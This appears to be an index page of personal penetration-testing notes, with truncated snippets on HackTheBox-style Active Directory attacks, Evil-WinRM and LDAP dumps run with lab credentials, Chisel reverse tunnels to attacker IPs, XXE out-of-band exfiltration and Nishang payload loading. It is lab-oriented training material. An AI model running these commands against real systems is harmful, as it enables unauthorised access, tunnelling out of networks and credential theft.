Shuciran Pentesting Notes

Timelapse (Easy)

Host entries 10.10.11.152 dc01.timelapse.htb timelapse.htb If Active Directory => NTP Synchronization with the domain controller. Content Kerberos enumeration RPC Enumeration SMB En...

DCSync Attack

Basic Access: Evil-WinRM to access a system via port tcp-5985: evil-winrm -i 10.10.11.158 -u 'nikk37' -p 'get_dem_girls2@yahoo.com' Examples: [[Forest#^b22389]] Active Directory Certificate S...

PowerView Modules

Calling an operating system API from PowerShell is not completely straightforward. Fortunately, other researchers have presented a technique that simplifies the process and also helps avoid endpoin...

Legacy PFX Certificate

Login via PFX File: First we need to extract the key and the certificate from the pfx file: # Extracting the public certificate: openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out public...

Chisel

Download Chisel Remote port forwarding Chisel as client: # Single Port .\chisel.exe client 10.10.16.4:1337 R:1433:localhost:1433 # All the ports ./chisel client 10.10.14.3:1234 R:127.0.0.1:socks ...

XXE Blind Out of Band

Detection You can often detect blind XXE using the same technique as for XXE SSRF attacks but triggering the out-of-band network interaction to a system that you control. For example, you would def...

XXE Basic

Headers: To exploit an XXE, the Content-Type must be text/xml POST /action HTTP/1.0 Content-Type: text/xml File Reading While exploring an XXE it is important to use the tags provided by the appl...

Powershell Modules

Nishang If we want to add a .ps1 file into a Windows machine, such as one from the Nishang series, we can modify the last line of that file (to load the script and then execute it): Write-Warning "S...

NTP (UDP 123)

Basic Enumeration ntpq -c readlist <IP_ADDRESS> ntpq -c readvar <IP_ADDRESS> ntpq -c peers <IP_ADDRESS> ntpq -c associations <IP_ADDRESS> ntpdc -c monlist <IP_ADDRESS>...

LDAP (tcp-369, tcp-636, tcp-3268)

LDAPDOMAINDUMP Dumping useful information from the domain controller via LDAP: ldapdomaindump -u 'htb.local\amanda' -p 'Ashare1972' 10.10.10.103 [*] Connecting to host... [*] Binding to host [+] Bi...